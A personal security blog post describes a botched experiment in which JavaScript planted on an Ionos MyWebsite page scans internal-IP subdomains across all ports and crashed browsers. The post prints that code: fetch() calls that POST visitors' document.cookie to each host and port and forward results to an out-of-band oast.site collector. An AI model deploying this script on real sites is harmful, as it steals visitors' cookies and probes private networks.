Javascript silliness

Creating a testpage:

    So, after taking some offensive javascript lessons, the bright idea came to mind that I should see what else I can make with it. I'd been playing with some ideas about dnsrebinding and using subdomains that resolve to internal ips as pivot points to point to private ips, and I'd found a way to sort through all the subdomains one at a time and try to resolve them. So I added that with other pre-existing knowledge. I have heard many times of people making javascript use websockets to then scan the network so I thought, pft, do you even need websockets for this?

    Well, there's some problems. First of which, it seems the method of doing this waits until completion to move along. That will bog down most browsers. I was also trying to go off of an extremely large list of subdomains and literally all ports. So browser tab had to wait on (lots of ips) on (65550) ports. Terrible design, terrible idea, aaaaaand then came the weird part.

    It worked, but it overloaded chrome until it shuts down.

MyWebsite from ionos

    Ionos has a platform called MyWebsite which allows users to create a website with templates and features and really super user friendly way to setup a page. Well, in the background this uses wordpress. Many multitenant web hosting providers do this and usually all have some wrapper around this. In my case, this was unintentionally the biggest hurdle of the whole thing. Because everything is designed for user experience, giving direct access to the files isn't going to be available. When trying to delete the page to continue editing or retry, failed. Can't access because it loads the js on page to show the preview when trying to edit the page. Trying to make and remove another page, I wasn't able to replay the deletion request to rewrite it. 

    Here's an example of it running, be sure to filter the connections for 10.0.0.0/8 ip ranges.
https://app.any.run/tasks/546fb212-d18e-4eaa-ba1b-da154e86ba1d
    
I was able to contact their support team and at this time we're waiting to see if they can remove the page for me.

EDIT: After a couple days they responded back saying their devs couldn't find the script causing this and asked permission to remove it. I reminded them that this is what I asked anyway and also showed them how to curl the page and grep the base64 encoded script. Maybe later I'll describe why them encoding your content like that is plausibly a bad idea, but for now, another 2 days later it's resolved. 

So what was the code?

    Alright, so long story short it basically was something roughly like this.
  
const rebindstart = 1;
const rebindend = 65550;
const listing=[
  (a bunch of stuff here, think I found it with subfinder)
;
listing.forEach((domain) => {
Array.from({ length: rebindend - rebindstart + 1 }, (_, index) => rebindstart + index).forEach(port => {
 try{
fetch('https://'+domain+':'+port,{method: 'POST', mode: 'no-cors', body: document.cookie,}).then(data => {obj = data;});
fetch('https://(mytesting).oast.site',{method: 'POST', mode: 'no-cors', body: obj,});
new Promise(r => setTimeout(r, 20));
 } catch(error){}
 });
 });
    So lets go through this. Start at 1, end at 65550; so we know it's all ports. Then the large listing of subdomains. I then used a foreach from listing, apparently this isn't the ideal way to do this maybe async with for of instead would have functioned better. Also changing the array to something like
Array.from(["80","8080","443","8443","10000","88","5789"]).forEach(port => {
    The code then does a simple fetch, for each port on each and tries to then redirect that document.cookie over to an out of band (oast) site. You can see why this would be problematic for companies' reputation for companies that do public subdomains with private ips being leveraged by attackers to gain access to network resources. Which is incredibly common (most cloud providers, most retail businesses, social media sites, etc...), especially with kubernetes clusters. 

    The whole thing looks something like this:



Thanks for reading

If you need any IT or CyberSecurity work remotely or within the DFW area, please contact us over at FeemcoTechnologies.

Comments

Post a Comment

Popular Posts

Updates

 Windows 11:  That required upgrade you can't perform     I have a lot of issues with using windows, apple, or red hat, and it's mostly because I grew up believing that people shouldn't have to pay to use a computer they already paid for. One time physical purchase, should be an all inclusive package. Sadly, thats not how the world works these days. Now days, your phone apps update every day, your phone updates every week, your computer updates every tuesday and at random, all of them enforce reboots or risk crashing the respective systems, blah. It's all pretty horrible. Now we have Windows 11 out for a while, with even high-end gaming computers that were purchased just before it's release, unable to run windows 11 on it.     If this was just a "my hardware isn't good enough" for it, I guess I could see that. ya know, service purchase with updates and all this garbage, fine. But in some cases, like mine, I have a windows 10 PC waiting to upgrade becau...
Read more

Weird hunting

Image
Bug hunting, threat hunting... license hunting?      Found myself doing some weird hunting, not finding anything special, but it was fun to keep some skills up. To start with, I was spending some time digging through some github repos using a tool called trufflehog . This is a secrets detection tool thats used specifically to determine if secrets have been leaked in code repos. It's really good for finding leaked passwords, apikeys, session tokens, etc... In my case, I was searching and stumbled across a result I wasn't too sure about. It was a .DS_Store file. These files are often left behind by Apple Mac OS when accessing specific filesystems ( you can find details on why this is a thing with a quick google ).  The main idea however, is that for support of specific systems, mac used a metadata caching mechanism, mostly filenames. Sometimes when finding these files, you can extract data from them in order to identify other files you should try to access. The file th...
Read more

Networking Basics - Pentesting Training part 1

Image
Primer:      I want to make a tutorial that I could show my kid to help them understand hacking, methodology, basics, etc... so this is an introduction post, more will follow, and maybe I can add a video series to go along with this.     The first thing to talk about, is what and why. Technology, while ever changing, can will always fall victim to several problems.  First is the idea that use case when created, won't match use case performed. Such as, when creating a remote for a TV, it may use infrared to point to the TV, and that works fine when one TV is in the same room at a time. When more then this is added, conflicts are caused and the light used for remote is picked up by the infrared sensor on multiple TVs. Change channels on one, both go. Second is that nothing created by man, is or is capable of creating, flawlessness. Business profits drive innovation, but not perfectionism (or the attempt to become close to perfect).     With these is...
Read more